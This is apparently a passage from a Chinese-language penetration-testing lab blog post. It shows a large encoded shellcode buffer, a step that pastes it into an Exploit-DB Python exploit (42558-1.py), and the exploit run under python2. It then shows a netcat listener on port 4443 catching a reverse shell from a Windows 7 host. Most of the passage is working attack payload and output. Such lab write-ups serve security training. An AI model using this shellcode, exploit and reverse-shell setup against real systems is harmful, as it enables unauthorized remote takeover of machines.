buf += b"\x34\x64\x33\x6b\x51\x4b\x33\x51\x73\x69\x71\x4a"
buf += b"\x33\x61\x59\x6f\x69\x70\x71\x4f\x43\x6f\x61\x4a"
buf += b"\x6c\x4b\x34\x52\x78\x6b\x6e\x6d\x43\x6d\x65\x38"
buf += b"\x37\x43\x77\x42\x57\x70\x63\x30\x43\x58\x33\x47"
buf += b"\x33\x43\x45\x62\x43\x6f\x63\x64\x51\x78\x42\x6c"
buf += b"\x70\x77\x54\x66\x55\x57\x49\x6f\x58\x55\x6f\x48"
buf += b"\x6a\x30\x57\x71\x57\x70\x73\x30\x36\x49\x69\x54"
buf += b"\x51\x44\x30\x50\x61\x78\x74\x69\x6d\x50\x72\x4b"
buf += b"\x57\x70\x49\x6f\x78\x55\x70\x50\x72\x70\x52\x70"
buf += b"\x52\x70\x43\x70\x50\x50\x47\x30\x30\x50\x65\x38"
buf += b"\x39\x7a\x36\x6f\x39\x4f\x4d\x30\x79\x6f\x6a\x75"
buf += b"\x6f\x67\x42\x4a\x74\x45\x70\x68\x4b\x70\x59\x38"
buf += b"\x48\x48\x54\x46\x70\x68\x35\x52\x53\x30\x77\x61"
buf += b"\x31\x4b\x6b\x39\x7a\x46\x31\x7a\x74\x50\x56\x36"
buf += b"\x30\x57\x53\x58\x4e\x79\x6e\x45\x61\x64\x65\x31"
buf += b"\x49\x6f\x4a\x75\x4d\x55\x59\x50\x70\x74\x34\x4c"
buf += b"\x69\x6f\x32\x6e\x77\x78\x53\x45\x5a\x4c\x50\x68"
buf += b"\x7a\x50\x6f\x45\x59\x32\x76\x36\x79\x6f\x68\x55"
buf += b"\x72\x48\x45\x33\x70\x6d\x72\x44\x55\x50\x6c\x49"
buf += b"\x78\x63\x32\x77\x66\x37\x72\x77\x65\x61\x4a\x56"
buf += b"\x30\x6a\x62\x32\x46\x39\x52\x76\x59\x72\x6b\x4d"
buf += b"\x61\x76\x69\x57\x43\x74\x55\x74\x37\x4c\x36\x61"
buf += b"\x77\x71\x4c\x4d\x30\x44\x34\x64\x54\x50\x78\x46"
buf += b"\x55\x50\x42\x64\x72\x74\x36\x30\x56\x36\x66\x36"
buf += b"\x43\x66\x61\x56\x63\x66\x42\x6e\x50\x56\x76\x36"
buf += b"\x61\x43\x50\x56\x52\x48\x72\x59\x58\x4c\x55\x6f"
buf += b"\x4e\x66\x39\x6f\x6e\x35\x4e\x69\x4d\x30\x52\x6e"
buf += b"\x50\x56\x72\x66\x4b\x4f\x30\x30\x70\x68\x54\x48"
buf += b"\x4b\x37\x77\x6d\x73\x50\x39\x6f\x6a\x75\x6d\x6b"
buf += b"\x68\x70\x38\x35\x6d\x72\x50\x56\x43\x58\x6e\x46"
buf += b"\x7a\x35\x6d\x6d\x6f\x6d\x4b\x4f\x59\x45\x75\x6c"
buf += b"\x37\x76\x51\x6c\x67\x7a\x4f\x70\x6b\x4b\x59\x70"
buf += b"\x63\x45\x67\x75\x4f\x4b\x71\x57\x66\x73\x52\x52"
buf += b"\x52\x4f\x52\x4a\x33\x30\x62\x73\x4b\x4f\x4a\x75"
buf += b"\x41\x41"

把上面生成的東西覆蓋原本python檔內的buf +=

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim 42558-1.py

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python 42558-1.py
  File "/home/kali/PT_day3/42558-1.py", line 90
    print "[*] Connection Success."
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?

┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python2 42558-1.py
[*] Connection Success.

別忘了要先監聽port:

┌──(root㉿kali)-[~]
└─# nc -lvnp 4443
listening on [any] 4443 ...
connect to [192.168.200.6] from (UNKNOWN) [172.16.1.87] 49159
Microsoft Windows [▒▒▒▒ 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>









Related Posts

Click and Drag to Scroll

Click and Drag to Scroll

[20] 強制轉型 - 轉換值、ToString、JSON

[20] 強制轉型 - 轉換值、ToString、JSON

SQL & NoSQL

SQL & NoSQL


Comments